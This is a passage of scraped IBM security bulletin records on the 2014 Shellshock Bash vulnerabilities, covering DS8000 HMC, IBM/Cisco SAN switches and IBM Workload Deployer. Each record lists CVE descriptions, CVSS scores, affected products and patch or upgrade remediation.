disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by the DS8000 HMC.\n\n## Vulnerability Details\n\n \nThis update provides details on additional Bash related vulnerabilities since the original publication. \n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96153_**](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96209_**](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n \n**CVE-ID**: [_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nAll versions of DS8000 HMC\n\n## Remediation/Fixes\n\nIBM strongly suggests that you install the vulnerability fix identified below: \n \nThe patch applies vulnerability fixes to the HMC only (1 min to apply + 10-30 min HMC reboot) and does not change the base DS8000 VRMF or require a full code update. \n \nThe CVE_BASH_BUG_PATCH_v1.0.iso is available on [www.ibm.com/support/fixcentral](<http://www.ibm.com/support/fixcentral/>) \n \n**Note: The patch (****CVE_BASH_BUG_PATCH_v1.0****) ****is common and applicable to R4.3, R6.3 and R7.0, R7.1, R7.2 and R7.3** \n \n\n\nProduct| VRMF| APAR| Remediation First Fix \n---|---|---|--- \nDS8870| CVE_BASH_BUG_PATCH_v1.0| N/A| Oct 3rd 2014 \nDS8800| CVE_BASH_BUG_PATCH_v1.0| N/A| Oct 3rd 2014 \nDS8700| CVE_BASH_BUG_PATCH_v1.0| N/A| Oct 3rd 2014 \nDS8100/DS8300| CVE_BASH_BUG_PATCH_v1.0| N/A| Oct 3rd 2014 \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNo complete mitigation is known \n\nRestricting SSH session access provides a partial mitigation\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"ST8NCA\",\"label\":\"Disk systems-\\u003EDS8870\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STUVMB\",\"label\":\"Disk systems-\\u003EDS8700\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STXN8P\",\"label\":\"IBM DS8800\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"HW2C2\",\"label\":\"Disk systems-\\u003EDS8300\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"HW2B2\",\"label\":\"Disk systems-\\u003EDS8100\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-24T17:06:20", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect DS8000\n HMC (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-05-24T17:06:20", "id": "ED25520B668714457490EC7907530FE368D1DD7120FD7A98A7598F3BBE3A9333", "href": "https://www.ibm.com/support/pages/node/689967", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:56", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM/Cisco switches and directors.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96153_](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96209_](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n**The Following are IBM/Cisco Switches and Directors:** \n \n**IBM MTM:** \n \n**9710-E01 **MDS 9250i Multilayer Fabric Switch \n**9710-E08 **MDS 9710 Director \n**2054-E01 **MDS 9222i Multilayer Fabric Switch \n**2054-E04 **(2062-D04) MDS 9506 Multilayer Director \n**2054-E11 (**2062-E11) MDS 9513 Multilayer Director \n**2054-E07 **(2062-D07) MDS 9509 Multilayer Director \n**2053-424 **(2417-C24) MDS 9124 Fabric Switch \n**2053-434 **(2053-S34) MDS 9134 Fabric Switch \n**2417-C48 **MDS 9148 Fabric Switch \n**3722-S51 **5010 Switch \n**3722-S52 **5020 Switch\n\n## Remediation/Fixes\n\nIBM recommends that you remediate the Bash vulnerability by updating to the following code release. \n \n**NX-OS Release 6.2(9a)** \n \n**Release Information:** \n<http://www.cisco.com/c/en/us/td/docs/switches/datacenter/mds9000/sw/6_2/release/notes/nx-os/mds_nxos_rn_629a.html> \n \n \n \n**NX-OS Release 5.2(8e)** \n \n**Release Information:** \n<http://www.cisco.com/c/en/us/td/docs/switches/datacenter/mds9000/sw/5_2/release/notes/nx-os/mds_nxos_rn_528e.html> \n \n \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information.\n\n## Workarounds and Mitigations\n\n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www-03.ibm.com/systems/z/advantages/security/integrity_sub.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n[__On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Change History\n\n16 October 2014: Original Version Published \n03 November 2014 CVE info for 7186 and 7187 \n03 November 2014 Added Link to fix in th e5.2(8e) code level\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSU6LN\",\"label\":\"Cisco MDS 9710 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"Enterprise\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"ST6VQW\",\"label\":\"Storage area network (SAN)-\\u003ECisco MDS 9124 Fabric Switch\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"SSY5QTU\",\"label\":\"Cisco MDS 9250i Multiservice Fabric Switch\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"SSBDGXE\",\"label\":\"Cisco MDS 9506 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"ST7SML\",\"label\":\"Storage area network (SAN)-\\u003ECisco MDS 9509 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STTQ3Y\",\"label\":\"Cisco MDS 9513 Multiplayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T15:07:09", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM/Cisco Switches and Directors (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T15:07:09", "id": "A6544AE2F106D4044D792AEEA71A0CA740A53B749B99628C2699395F9F087031", "href": "https://www.ibm.com/support/pages/node/690071", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-29T02:13:05", "description": "## Summary\n\nBash is available in Red Hat Linux virtual machine images that can be deployed by using IBM Workload Deployer. Six Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM Workload Deployer.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially crafted environment variables passed to it by the Bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, and the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, and the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nAll versions of IBM Workload Deployer 3.1 and later fix packs\n\n## Remediation/Fixes\n\nThe solution is to apply the fixes with the following direction: \n \nUpgrade the deployed virtual machines by using one of the following two methods: \n \n**Option 1:** Update the virtual machine by using an eFix provided by IBM: \n\n\n * Download the eFix from IBM Fix Central (see the following link):\n 